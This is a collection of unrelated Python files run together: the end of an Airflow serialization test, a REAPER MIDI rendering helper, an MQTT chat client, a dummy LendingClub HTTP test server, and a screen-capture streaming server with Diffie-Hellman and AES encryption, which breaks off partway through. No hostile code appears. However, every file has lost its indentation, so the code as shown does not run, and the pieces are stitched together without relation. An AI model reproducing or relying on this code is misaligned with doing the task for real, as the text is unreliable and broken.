task5 = DummyOperator(task_id="task5")
task1 >> group234
group34 >> task5
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.task_group.children
assert serialized_dag.task_group.children.keys() == dag.task_group.children.keys()
def check_task_group(node):
try:
children = node.children.values()
except AttributeError:
# Round-trip serialization and check the result
expected_serialized = SerializedBaseOperator.serialize_operator(dag.get_task(node.task_id))
expected_deserialized = SerializedBaseOperator.deserialize_operator(expected_serialized)
expected_dict = SerializedBaseOperator.serialize_operator(expected_deserialized)
assert node
assert SerializedBaseOperator.serialize_operator(node) == expected_dict
return
for child in children:
check_task_group(child)
check_task_group(serialized_dag.task_group)
def test_kubernetes_optional():
"""Serialisation / deserialisation continues to work without kubernetes installed"""
def mock__import__(name, globals_=None, locals_=None, fromlist=(), level=0):
if level == 0 and name.partition('.')[0] == 'kubernetes':
raise ImportError("No module named 'kubernetes'")
return importlib.__import__(name, globals=globals_, locals=locals_, fromlist=fromlist, level=level)
with mock.patch('builtins.__import__', side_effect=mock__import__) as import_mock:
# load module from scratch, this does not replace any already imported
# airflow.serialization.serialized_objects module in sys.modules
spec = importlib.util.find_spec("airflow.serialization.serialized_objects")
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
# if we got this far, the module did not try to load kubernetes, but
# did it try to access airflow.kubernetes.*?
imported_airflow = {
c.args[0].split('.', 2)[1] for c in import_mock.call_args_list if c.args[0].startswith("airflow.")
}
assert "kubernetes" not in imported_airflow
# pod loading is not supported when kubernetes is not available
pod_override = {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
with pytest.raises(RuntimeError):
module.BaseSerialization.from_dict(pod_override)
# basic serialization should succeed
module.SerializedDAG.to_dict(make_simple_dag()["simple_dag"])
|
utils.py
|
import os
import sys
import glob
import time
import threading
import pretty_midi
import beyond.Reaper
from copy import deepcopy
from rearender.autogui import click_window
def traverse_dir(
root_dir,
extension=('mid', 'MID', 'midi'),
amount=None,
str_=None,
is_pure=False,
verbose=False,
is_sort=False,
is_ext=True):
if verbose:
print('[*] Scanning...')
file_list = []
cnt = 0
for root, _, files in os.walk(root_dir):
for file in files:
if file.endswith(extension):
if (amount is not None) and (cnt == amount):
break
if str_ is not None:
if str_ not in file:
continue
mix_path = os.path.join(root, file)
pure_path = mix_path[len(root_dir)+1:] if is_pure else mix_path
if not is_ext:
ext = pure_path.split('.')[-1]
pure_path = pure_path[:-(len(ext)+1)]
if verbose:
print(pure_path)
file_list.append(pure_path)
cnt += 1
if verbose:
print('Total: %d files' % len(file_list))
print('Done!!!')
if is_sort:
file_list.sort()
return file_list
def set_gobal_bpm(bpm):
retval, proj, ptidx, timeposOut, measureposOut, beatposOut, bpmOut, timesig_numOut, timesig_denomOut, lineartempoOut = Reaper.RPR_GetTempoTimeSigMarker(0, -1, 0, 0, 0, 0, 0, 0, 0)
Reaper.SetTempoTimeSigMarker(0, ptidx, timeposOut, measureposOut, beatposOut, bpm, timesig_numOut, timesig_denomOut, lineartempoOut)
Reaper.UpdateArrange()
Reaper.UpdateTimeline()
def clear_all():
# delet items
Reaper.Main_OnCommand(40035, 0)
Reaper.Main_OnCommand(40006, 0)
# got to start
Reaper.CSurf_GoStart()
def move_cursor_start():
Reaper.CSurf_GoStart()
def set_current_track(tidx):
Reaper.Main_OnCommand(40297, 0) # unselected all track
Reaper.SetTrackSelected( # set selected track
Reaper.GetTrack(0, tidx), True)
def set_track_media(path_track, tidx, is_press=False):
Reaper.CSurf_GoStart()
set_current_track(tidx)
if is_press:
t = threading.Thread(target=click_window)
t.start()
Reaper.InsertMedia(path_track, 0)
def render_media(
path_media,
path_audio,
bpm=None,
is_press=False,
track_idx=0):
'''
function for rendering single track midi file or audio file
the media will be inserted in the 1st track
'''
clear_all()
move_cursor_start()
# set bpm
if bpm:
set_gobal_bpm(int(bpm))
# set media
set_track_media(path_media, track_idx, is_press=is_press)
# set audio filename
filename = os.path.basename(path_audio)
outdir = path_audio[:-len(filename)]
print('filename:', filename)
print('outdir:', outdir)
Reaper.GetSetProjectInfo_String(0, "RENDER_FILE", outdir, True)
Reaper.GetSetProjectInfo_String(0, "RENDER_PATTERN", filename, True)
# save
Reaper.Main_OnCommand(40296, 0) # select all
Reaper.Main_OnCommand(41824, 0) # render project
def render_multi_media(
mapping_dict,
path_audio,
bpm=None,
is_press=None,
):
clear_all()
move_cursor_start()
# set bpm
if bpm:
set_gobal_bpm(int(bpm))
# set media
for idx, (track_idx, path_media) in enumerate(mapping_dict.items()):
if isinstance(is_press, list):
isp = is_press[idx]
else:
isp = is_press
set_track_media(path_media, track_idx, is_press=is_press)
# set audio filename
filename = os.path.basename(path_audio)
outdir = path_audio[:-len(filename)]
print('filename:', filename)
print('outdir:', outdir)
Reaper.GetSetProjectInfo_String(0, "RENDER_FILE", outdir, True)
Reaper.GetSetProjectInfo_String(0, "RENDER_PATTERN", filename, True)
# save
Reaper.Main_OnCommand(40296, 0) # select all
Reaper.Main_OnCommand(41824, 0) # render project
if __name__ == '__main__':
# test functions here
pass
|
client.py
|
import argparse
import configparser
import threading
import json
import datetime
import time
import logging
import os
from that_automation_tool.communication import Communication
DEBUGGING = True
# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
try:
fmsg = json.loads(msg.payload)
print("{}: {}".format(datetime.datetime.fromtimestamp(fmsg['timestamp']).strftime('%H:%M:%S'), fmsg['message']))
except Exception as e:
print(e)
print("{}: {} {}".format(datetime.datetime.fromtimestamp(time.time()).strftime('%H:%M:%S'), msg.topic,
str(msg.payload)))
if __name__ == "__main__":
if DEBUGGING:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
# get configuration path from arguments
parser = argparse.ArgumentParser(description="Do some IoT things")
parser.add_argument("-c", "--config", help="path to configuration file")
args = parser.parse_args()
if not args.config:
raise Exception("Configuration parameter missing")
cfg_pth = os.path.abspath(args.config)
logger.debug("Configuration path is %s", cfg_pth)
# read config file
config = configparser.ConfigParser()
config.read(cfg_pth)
if "MQTT" not in config.sections():
raise Exception("MQTT missing from configuration file")
mqtt_handler = Communication(config["MQTT"])
mqtt_handler.register_callback("/chat/#", on_message)
# set will to say goodbye to our friends
mqtt_handler.will = ("/chat/3", json.dumps({"event": "connection_lost"}), 2, False)
def threaded_thing():
while True:
msg = input()
# since we're group 3, this value is hardcoded
mqtt_handler.publish("/chat/3", msg, qos=2)
thrd = threading.Thread(target=threaded_thing)
thrd.setDaemon(True)
thrd.start()
mqtt_handler.connect_async()
while True:
# since our handler doesn't have a blocking run, we'll do it ourselves
time.sleep(2000)
|
server.py
|
#!/usr/bin/env python
"""
A dummy web server used to test the LendingClub API requests
"""
"""
The MIT License (MIT)
Copyright (c) 2013 Jeremy Gillick
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import os
import json
import urllib.parse
import cgi
import socketserver
from threading import Thread
from http.server import BaseHTTPRequestHandler
logging = None
http_session = {}
session_disabled = False
class TestServerHandler(BaseHTTPRequestHandler):
httpd = None
query = None
data = None
headers_sent = False
auth = {
'email': 'test@test.com',
'password': 'supersecret'
}
"""
Dummy authenticated email and password for this LendingClub server.
Any other combination will fail on auth.
"""
def log(self, msg):
global logging
msg = 'SERVER: {0}'.format(msg)
if logging is not None:
logging.debug(msg)
else:
print('{0}\n'.format(msg))
def start(self):
"""
Start the http server
"""
self.log('Server started...')
self.httpd.serve_forever()
def stop(self):
"""
Shutdown http server
"""
self.httpd.shutdown()
def send_headers(self, status_code=200, headers=None, content_type="text/plain"):
"""
Send all the HTTP headers and prepare the response for content
"""
self.send_response(status_code)
self.send_header('Content-Type', content_type)
if type(headers) is dict:
for key, value in headers.items():
self.send_header(key, value)
# Debug by echoing the query and data base
if self.query:
self.send_header('x-echo-query', repr(self.query))
if self.data:
self.send_header('x-echo-data', repr(self.data))
self.end_headers()
self.headers_sent = True
def read_asset_file(self, file_name):
"""
Read a file from the assets directory
"""
this_dir = os.path.dirname(os.path.realpath(__file__))
asset_file = os.path.join(this_dir, 'assets', file_name)
if not os.path.exists(asset_file):
raise Exception('The asset file \'{0}\' does not exist in {1}'.format(file_name, this_dir))
return open(asset_file).read()
def write(self, output):
"""
Write to the response stream and send default headers if they haven't been sent yet
"""
if self.headers_sent is False:
self.send_headers()
self.wfile.write(output)
def add_session(self, key, value):
"""
Add a value to the HTTP session
"""
global http_session
if not session_disabled:
http_session[key] = value
print('Add to session: {0}={1}'.format(key, value))
def output_file(self, file_name):
"""
Read a file from the assets directory and write it to response stream
"""
self.write(self.read_asset_file(file_name))
def output_error_json(self, message):
"""
Output a JSON error message to the response stream
"""
error = {
'result': 'error',
'error': [message]
}
self.write(json.dumps(error))
def process_post_data(self):
content_len = int(self.headers.getheader('content-length'))
postvars = cgi.parse_qs(self.rfile.read(content_len))
# Flatten values
for key, values in postvars.items():
if len(values) == 1:
postvars[key] = values[0]
self.data = postvars
def process_url(self):
"""
Separate the path from the query
"""
url = urllib.parse.urlparse(self.path)
self.path = url.path
self.query = urllib.parse.parse_qs(url.query)
# Flatten query string values
for key, values in self.query.items():
if len(values) == 1:
self.query[key] = values[0]
def do_GET(self):
"""
Process at GET request
"""
global http_session
self.process_url()
path = self.path
query = self.query
#self.log('GET {0} {1}'.format(path, query))
# Summary page
if '/account/summary.action' == path:
self.write('Summary Page')
# Cash balance JSON
elif '/browse/cashBalanceAj.action' == path:
self.output_file('cashBalanceAj.json')
# Portfolio list
elif '/data/portfolioManagement' == path:
if 'method' in query:
if query['method'] == 'getLCPortfolios':
self.output_file('portfolioManagement_getLCPortfolios.json')
else:
self.write('Unknown method {0}'.format(query['method']))
else:
self.write('No method provided')
# Place order and strut token
elif '/portfolio/placeOrder.action' == path:
self.output_file('placeOrder.html')
# Select portfolio option and save to session
elif '/portfolio/recommendPortfolio.action' == path:
self.add_session('lending_match_point', query['lending_match_point'])
self.send_headers(302, {'location': '/portfolio/autoInvest.action'})
# Clear portfolio building session
elif '/portfolio/confirmStartNewPortfolio.action' == path:
if 'lending_match_point' in http_session:
del http_session['lending_match_point']
self.send_headers(302, {'location': '/portfolio/viewOrder.action'})
# Get list of loan fractions (must have lending_match_point set in the session)
elif '/data/portfolio' == path and 'getPortfolio' == query['method']:
if 'lending_match_point' in http_session:
self.output_file('portfolio_getPortfolio.json')
else:
print('lending_match_point was not set')
self.write('{"error": "The lending match point was not set"}')
# Saved filters
elif '/browse/getSavedFiltersAj.action' == path:
self.output_file('getSavedFiltersAj.json')
# One saved filter
elif '/browse/getSavedFilterAj.action' == path and 'id' in query and query['id'] in ['1', '2']:
self.output_file('getSavedFilterAj_{0}.json'.format(query['id']))
# Stage an order
elif '/data/portfolio' == path and 'addToPortfolioNew' == query['method']:
self.output_file('portfolio_addToPortfolioNew.json')
# Stage an order 2
elif '/data/portfolio' == path and 'addToPortfolio' == query['method']:
self.output_file('portfolio_addToPortfolio.json')
# Loan list for validation
elif '/filter_validation' == path and 'id' in query and query['id'] in ['1', '2', '3']:
self.output_file('filter_validate_{0}.json'.format(query['id']))
# Get a dump of the session
elif '/session' == path:
self.write(json.dumps(http_session))
# Nothing here yet
elif '/portfolio/autoInvest.action' == path:
self.write('/portfolio/autoInvest.action')
elif '/portfolio/viewOrder.action' == path:
self.write('/portfolio/viewOrder.action')
else:
self.write('{"error": "Unknown path"}')
def do_POST(self):
"""
Process at POST request
"""
global http_session, session_disabled
#self.log('POST {0}'.format(self.path))
self.process_url()
self.process_post_data()
path = self.path
data = self.data
query = self.query
#self.log('Post Data {0}'.format(self.data))
# Login - if the email and password match, set the cookie
if '/account/login.action' == path:
if data['login_email'] == self.auth['email'] and data['login_password'] == self.auth['password']:
self.send_headers(302, {
'Set-Cookie': 'LC_FIRSTNAME=John',
'Content-Type': 'text/plain',
'location': '/account/summary.action'
})
return
else:
self.output_file('login_fail.html')
# Search
elif '/browse/browseNotesAj.action' == path and 'method' in data and data['method'] == 'search':
ver = '1'
if 'browseNotesAj' in http_session:
ver = http_session['browseNotesAj']
self.output_file('browseNotesAj_{0}.json'.format(ver))
# Investment option search
elif '/portfolio/lendingMatchOptionsV2.action' == path:
# Default filters
if data['filter'] == 'default':
self.output_file('lendingMatchOptionsV2.json')
# Custom filters
else:
self.output_file('lendingMatchOptionsV2_filter_1.json')
# Order confirmation
elif '/portfolio/orderConfirmed.action' == path:
if 'struts.token' in data and data['struts.token'].strip() != '':
self.output_file('orderConfirmed.html')
else:
print("No struts token passed")
self.write('{"error": "No struts token passed"}')
# Assign to portfolio
elif '/data/portfolioManagement' == path:
if 'method' in query:
# Existing portfolio
if 'addToLCPortfolio' == query['method']:
http_session['existing_portfolio'] = query['lcportfolio_name']
self.output_file('portfolioManagement_addToLCPortfolio.json')
# New portfolio
elif 'createLCPortfolio' == query['method']:
http_session['new_portfolio'] = query['lcportfolio_name']
self.output_file('portfolioManagement_createLCPortfolio.json')
else:
self.write('Unknown method: {0}'.format(query.method))
else:
self.write('{"error": "No method passed"}')
# Select a loan note
elif '/browse/updateLSRAj.action' == path:
self.output_file('updateLSRAj.json')
# Disable the session
elif '/session/disabled' == path:
session_disabled = True
http_session = {}
self.write('Session disabled')
# Enable the session
elif '/session/enabled' == path:
session_disabled = False
self.write('Session enabled')
# Add the post data to the session
elif '/session' == path:
if session_disabled is True:
self.write('{"error": "Session disabled"}')
else:
for key, value in data.items():
self.add_session(key, value)
self.send_headers(302, {'location': '/session'})
else:
self.write('{"error": "Unknown path"}')
def do_HEAD(self):
"""
Process at HEAD request
"""
return self.do_GET()
def do_DELETE(self):
"""
Process at DELETE request
"""
global http_session
# Delete the session
if '/session' == self.path:
http_session = {}
self.write(json.dumps(http_session))
else:
self.send_headers(500)
self.write('Unknown delete action: {0}'.format(self.path))
class ReusableServer(socketserver.TCPServer):
allow_reuse_address = True
class TestWebServer:
"""
Simple class to start/stop the server
"""
http = None
def __init__(self):
#self.http = HTTPServer(('127.0.0.1', 7357), TestServerHandler)
pass
def start(self):
print('Starting server at 127.0.0.1:8000')
self.http = ReusableServer(('127.0.0.1', 8000), TestServerHandler)
self.http.serve_forever()
def stop(self):
print('Stopping server...')
self.http.shutdown()
self.http = None
class ServerThread:
"""
Start the server in it's own thread
"""
httpd = None
thread = None
def __init__(self):
self.httpd = TestWebServer()
self.thread = Thread(target=self.httpd.start)
self.thread.daemon = True
def start(self):
self.thread.start()
print('Server thread started')
def stop(self):
self.httpd.stop()
#
# When called from the command line
#
if __name__ == '__main__':
server = TestWebServer()
try:
server.start()
except KeyboardInterrupt:
print('\nShutting down the test server')
server.stop()
|
streaming_multi_client_server_with_asyncio.py
|
# Need threading for multiple clients and a way to terminate gracefully
import threading
# Process command line arguments
import argparse
# Stamp the frames with a timestamp
import datetime
# May need for sleep
import time
# Necessary to process images with openCV
import numpy as np
import pyautogui
import imutils
import cv2
from PIL import UnidentifiedImageError, ImageFile
import os
# Needed for network communication
import pickle
import struct
# Needed to handle async calls
import asyncio
# For encryption
from cryptography.hazmat.primitives import hashes, hmac
from cryptography.hazmat.primitives.asymmetric import dh, padding, ec
from cryptography.hazmat.primitives.kdf.hkdf import HKDF
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.serialization import PublicFormat, \
Encoding, load_der_public_key, load_pem_public_key, load_pem_private_key
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
# Needed for logging
import logging
# Needed for exit handling
from contextlib import suppress
# Setting to handle partial frames
ImageFile.LOAD_TRUNCATED_IMAGES = True
# Globals for handling the frames
outputFrame = None
lock = threading.Lock()
# Global to handle streaming loops
stream = True
# Vars for Select
read_list = []
write_list = []
message_queues = {}
dh_keyexchanges = {}
client_derived_keys_ivs = {}
p = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF # noqa: E501
g = 2
serialized_RSA_server_public_key = None
RSA_server_private_key = None
disable_ecdh = False
loop = None
restricted = False
trusted_keys_whitelist = {}
# thread that listens for any input, used to terminate stream loop
# def key_capture_thread(server_socket):
# global stream
# input()
# stream = False
# print("starting exit process")
def capture_frames():
global outputFrame, lock, stream, message_queues
main_logger = logging.getLogger("main")
try:
# while not event.is_set():
while stream:
##
# im = Image.open('.screenshot2021-0501_20-10-04-094593.png')
# im.load()
##
# Grab a screenshot
frame = pyautogui.screenshot()
# Convert it cv2 color format and np array
frame = cv2.cvtColor(np.array(frame), cv2.COLOR_RGB2BGR)
# Resize so we send consistent amount of data
frame = imutils.resize(frame, width=800)
# Stamp Frame with current time.
timestamp = datetime.datetime.now()
cv2.putText(frame, timestamp.strftime(
"%A %d %B %Y %I:%M:%S%p"), (10, frame.shape[0] - 10),
cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)
with lock:
outputFrame = frame.copy()
time.sleep(0.1)
# print("captured a screenshot")
# print(stream)
except UnidentifiedImageError as e:
quoted_filename = e.args[0].split()[4]
filename = quoted_filename.strip("'")
if os.path.exists(filename):
os.remove(filename)
main_logger.info("Deleted leftover temp image file")
except OSError as e:
if e.errno == 2:
main_logger.debug("During shutdown temp file was not written to disk, capture thread aborted")
pass
else:
raise e
def encrypt(key, plaintext, iv):
# Declare cipher type
cipher = Cipher(algorithms.AES(key), modes.OFB(iv))
encryptor = cipher.encryptor()
# Encrypt
ciphertext = encryptor.update(plaintext) + encryptor.finalize()
return ciphertext
def decrypt(key, ciphertext, iv):
# Declare cipher type
cipher = Cipher(algorithms.AES(key), modes.OFB(iv))
decryptor = cipher.decryptor()
# Decrypt
deciphered_text = decryptor.update(ciphertext) + decryptor.finalize()
return deciphered_text
def generate_dh_key_pairs():
# Hard-coded p and g for DH Key exchange (RFC 3526 - group id 14)
global p, g
# Use our p and g with cryptography library
params_numbers = dh.DHParameterNumbers(p, g)
parameters = params_numbers.parameters(default_backend())
# Generate private and public key
host_private_key = parameters.generate_private_key()
host_public_key_enc = host_private_key.public_key().public_bytes(Encoding.DER,
PublicFormat.SubjectPublicKeyInfo)
return (host_private_key, host_public_key_enc)
def generate_ecdh_key_pairs():
host_private_key = ec.generate_private_key(
ec.SECP384R1()
)
host_public_key_enc = host_private_key.public_key().public_bytes(Encoding.DER,
PublicFormat.SubjectPublicKeyInfo)
return (host_private_key, host_public_key_enc)
def encrypt_and_send_AES_OFB_message(client_socket, plaintext, key, iv):
ciphertext = encrypt(key, plaintext, iv)
client_socket.send(len(ciphertext).to_bytes(2, "big") + ciphertext)
def lookupIP(client_socket, public_key):
client_socket.send(b'1')
client_socket.send(len(public_key).to_bytes(2, "big") + public_key)
output = client_socket.recv(1024)
return output
def registerPublicKey(client_socket, public_key, private_key):
client_socket.send(b'0')
signed_public_key = sign(private_key, public_key)
client_socket.send(len(public_key).to_bytes(2, "big") + public_key)
client_socket.send(len(signed_public_key).to_bytes(2, "big") + signed_public_key)
output = client_socket.recv(1024)
return output
def sign(private_key, data):
signature = private_key.sign(
data,
padding.PSS(
mgf=padding.MGF1(hashes.SHA256()),
salt_length=padding.PSS.MAX_LENGTH
),
hashes.SHA256()
)
return signature
def verify(public_key, signature, message):
# Verify signature
public_key.verify(
signature,
message,
padding.PSS(
mgf=padding.MGF1(hashes.SHA256()),
salt_length=padding.PSS.MAX_LENGTH
),
hashes.SHA256()
)
async def new_client(reader, writer):
global lock, stream, outputFrame, serialized_RSA_server_public_key, RSA_server_private_key
global disable_ecdh, loop, restricted, trusted_keys_whitelist
main_logger = logging.getLogger("main")
client_logger = logging.getLogger("client")
addr = writer.get_extra_info('peername')
main_logger.info(f"Client connected: {addr}")
client_logger_extras = {'clientip': f"{addr[0]}", 'clientport': f"{addr[1]}"}
client_logger = logging.LoggerAdapter(client_logger, client_logger_extras)
try:
# --------- DH Key EXCHANGE START -----------##
if disable_ecdh:
host_private_key, host_public_key_enc = generate_dh_key_pairs()
else:
host_private_key, host_public_key_enc = generate_ecdh_key_pairs()
data = await reader.read(4)
size = None
serialized_RSA_client_public_key = None
abort = False
if data == b"HELO":
size = await reader.read(2)
serialized_RSA_client_public_key = await reader.read(int.from_bytes(size, "big"))
initial_message = (b"HELO" +
len(serialized_RSA_server_public_key).to_bytes(2, "big") +
serialized_RSA_server_public_key)
client_logger.debug(f"Public Key Received: {serialized_RSA_client_public_key}")
if restricted:
if serialized_RSA_client_public_key not in trusted_keys_whitelist:
client_logger.info("Rejecting client, not in whitelist")
initial_message = b"RJKT"
writer.write(initial_message)
await writer.drain()
abort = True
return
writer.write(initial_message)
await writer.drain()
else:
abort = True
return
data = await reader.read(5)
if data == b"DHINI" and not abort:
writer.write(len(host_public_key_enc).to_bytes(2, "big") + host_public_key_enc)
await writer.drain()
else:
abort = True
return
data = await reader.read(4)
if data == b"PUBK" and not abort:
# The ECDH Key
size = await reader.read(2)
remote_public_key_enc = await reader.read(int.from_bytes(size, "big"))
client_logger.debug(f"KeyExchange: Size of remote's public key: {int.from_bytes(size, 'big')}")
client_logger.debug(f"Remote's public key: {remote_public_key_enc}")
# The message signature
size = await reader.read(2)
remote_signature = await reader.read(int.from_bytes(size, "big"))
intended_message = (serialized_RSA_server_public_key +
serialized_RSA_client_public_key +
host_public_key_enc +
remote_public_key_enc)
verify(load_pem_public_key(serialized_RSA_client_public_key), remote_signature, intended_message)
client_logger.info("Message Verified")
# The host_signature to prove the intended public key was received
host_message = serialized_RSA_server_public_key + remote_public_key_enc
with lock:
host_signature = sign(RSA_server_private_key, host_message)
writer.write(len(host_signature).to_bytes(2, "big") + host_signature + b"DHFIN")
await writer.drain()
remote_public_key = load_der_public_key(remote_public_key_enc, default_backend())
if disable_ecdh:
shared_key = host_private_key.exchange(remote_public_key)
else:
shared_key = host_private_key.exchange(ec.ECDH(), remote_public_key)
# client_derived_keys_ivs[s] = (derived_key, derived_iv)
# --------- DH Key EXCHANGE END -----------##
derived_key = HKDF(algorithm=hashes.SHA256(), length=32, salt=None, info=b'handshake data',).derive(shared_key) # noqa: E501
client_logger.debug(f"Derived Key: {derived_key}")
derived_iv = HKDF(algorithm=hashes.SHA256(), length=16, salt=None, info=b'aes ofb iv',).derive(shared_key) # noqa: E501
client_logger.debug(f"Derived IV: {derived_iv}")
# HMAC key
derived_hmac_key = HKDF(algorithm=hashes.SHA256(), length=32, salt=None, info=b'mac',).derive(shared_key) # noqa: E501
client_logger.debug(f"Derived HMAC Key: {derived_hmac_key}")
# Session ID
derived_session_id = HKDF(algorithm=hashes.SHA256(), length=32, salt=None, info=b'session id',).derive(shared_key) # noqa: E501
client_logger.debug(f"Derived Session ID: {derived_session_id}")
component_id = 1
else:
abort = True
return
while stream and not abort:
# img,frame = vid.read()
data = await reader.read(1024)
if data == b'READY':
# print("got a READY")
with lock:
# print("got LOCK")
serializedFrame = pickle.dumps(outputFrame)
# print("serializedFrame")
# print(serializedFrame[:10])
encr_serializedFrame = encrypt(derived_key, serializedFrame, derived_iv)
# print("encr_serializedFrame")
# print(encr_serializedFrame[:10])
message = derived_session_id
bytes_component_id = component_id.to_bytes(4, "big")
message += bytes_component_id
# when width was 800
# 1200165 when aspect ratio was 16:10
# 1080165 when aspect ratio was 16:9
# print("len encr_serializedFrame")
# print(len(encr_serializedFrame))
message += struct.pack("Q", len(encr_serializedFrame))+encr_serializedFrame
# Make an hmac for message
h = hmac.HMAC(derived_hmac_key, hashes.SHA256())
h.update(message)
message_hmac = h.finalize()
message = message_hmac + message
# print(struct.pack("Q",len(encr_serializedFrame)))
# message = len(serializedFrame).to_bytes(8, "big")+serializedFrame
# print(len(serializedFrame).to_bytes(8, "big"))
# print("sending FRAME")
writer.write(message)
await writer.drain()
component_id += 1
elif data == b'LEAVING':
break
if outputFrame is not None:
pass
# # Show the image, debugging
# cv2.imshow('SERVER STREAMING VIDEO',outputFrame)
# # Way to close the feed, required for imshow to work properly
# key = cv2.waitKey(1) & 0xFF
# if key ==ord('q') or not stream:
# # client_socket.close()
# break
except KeyboardInterrupt:
client_logger.info("Client Task was canceled")
stream = False
loop.stop()
except asyncio.TimeoutError:
client_logger.info('Client Timed out')
except ConnectionResetError:
client_logger.info('Client left unexpectdly')
finally:
writer.close()
client_logger.info('Connection Closed')
async def boot_server(host_ip, port):
server = await asyncio.start_server(new_client, port=port, host=host_ip)
# async with server:
await server.serve_forever()
def str2bool(arg):
if isinstance(arg, bool):
return arg
if arg.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif arg.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError("Boolean value expected:\n\t'yes', 'true', 't', 'y', '1', 'no', 'false', 'f', 'n', '0'") # noqa: E501
if __name__ == '__main__':
# Setup Logging
main_logger_Format = '{"Timestamp":"%(asctime)s", "Logger":"%(name)s", "Level":"%(levelname)s", "Message":"%(message)s"}' # noqa: E501
main_logger = logging.getLogger("main")
main_logger_ch = logging.StreamHandler()
main_formatter = logging.Formatter(main_logger_Format)
main_logger.setLevel(logging.WARNING)
main_logger_ch.setLevel(logging.WARNING)
client_logger_Format = '{"Timestamp":"%(asctime)s", "Logger":"%(name)s", "Level":"%(levelname)s", "ClientIP":"%(clientip)s", "ClientPort":"%(clientport)s", "Message":"%(message)s"}' # noqa: E501
client_logger = logging.getLogger("client")
client_logger_ch = logging.StreamHandler()
client_formatter = logging.Formatter(client_logger_Format)
client_logger.setLevel(logging.WARNING)
client_logger_ch.setLevel(logging.WARNING)
# Handle arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--host-ip", type=str, required=False,
help="ip address to serve on, default: 127.0.0.1", default='127.0.0.1')
ap.add_argument("-p", "--port", type=int, required=False,
help="port number to listen to, default: 9898", default=9898)
ap.add_argument("--pki-host-ip", type=str, required=False,
help="ip address of the PKI server to connect to, default: 127.0.0.1", default='127.0.0.1')
ap.add_argument("--pki-port", type=int, required=False,
help="PKI port number to connect to, default: 7777", default=7777)
ap.add_argument("--rsa-pub-key", type=str, required=False,
help="Path to RSA PEM public key, default: env/keys/server/public-key.pem", default='env/keys/server/public-key.pem')
ap.add_argument("--rsa-priv-key", type=str, required=False,
help="Path to RSA PEM private key, default: env/keys/server/private-key.pem", default='env/keys/server/private-key.pem')
ap.add_argument("--disable-ecdh", type=str2bool, required=False,
help="Disable Elliptic Curve key generation for Diffie-Hellman Key Exchange, default: False", default=False)
ap.add_argument("--restricted", type=str2bool, required=False,
help="Enable restricted mode, requires --whitelist argument, default: False", default=False)
ap.add_argument("--whitelist", type=str, required=False,
help="Path to folder containing trusted public keys, default: env/keys/server/trusted_keys", default="env/keys/server/trusted_keys")
ap.add_argument("-l", "--log-level", type=str, required=False,
help="Level of logging: info, debug, warning, error, default: warning", default='warning')
args = vars(ap.parse_args())
if (args["log_level"].lower() not in ["info", "warning", "debug", "error"]):
argparse.error('Unexpected log level entered. Valid choices are: info, error, warning, debug')
if args["log_level"].lower() == "info":
main_logger.setLevel(logging.INFO)
main_logger_ch.setLevel(logging.INFO)
client_logger.setLevel(logging.INFO)
client_logger_ch.setLevel(logging.INFO)
elif args["log_level"].lower() == "warning":
main_logger.setLevel(logging.WARNING)
main_logger_ch.setLevel(logging.WARNING)
client_logger.setLevel(logging.WARNING)
client_logger_ch.setLevel(logging.WARNING)
elif args["log_level"].lower() == "debug":
main_logger.setLevel(logging.DEBUG)
main_logger_ch.setLevel(logging.DEBUG)
client_logger.setLevel(logging.DEBUG)
client_logger_ch.setLevel(logging.DEBUG)
elif args["log_level"].lower() == "error":
main_logger.setLevel(logging.ERROR)
main_logger_ch.setLevel(logging.ERROR)
client_logger.setLevel(logging.ERROR)
client_logger_ch.setLevel(logging.ERROR)
main_logger_ch.setFormatter(main_formatter)
main_logger.addHandler(main_logger_ch)
client_logger_ch.setFormatter(client_formatter)
client_logger.addHandler(client_logger_ch)
if (args["restricted"] and args["whitelist"] == "env/keys/server/trusted_keys"):
main_logger.warning('The --restricted argument is being run with the default whitelist')
restricted = args["restricted"]
if args["restricted"]:
main_logger.info("Server is running in restricted mode, setting up whitelist...")
# For every file in whitelist directory
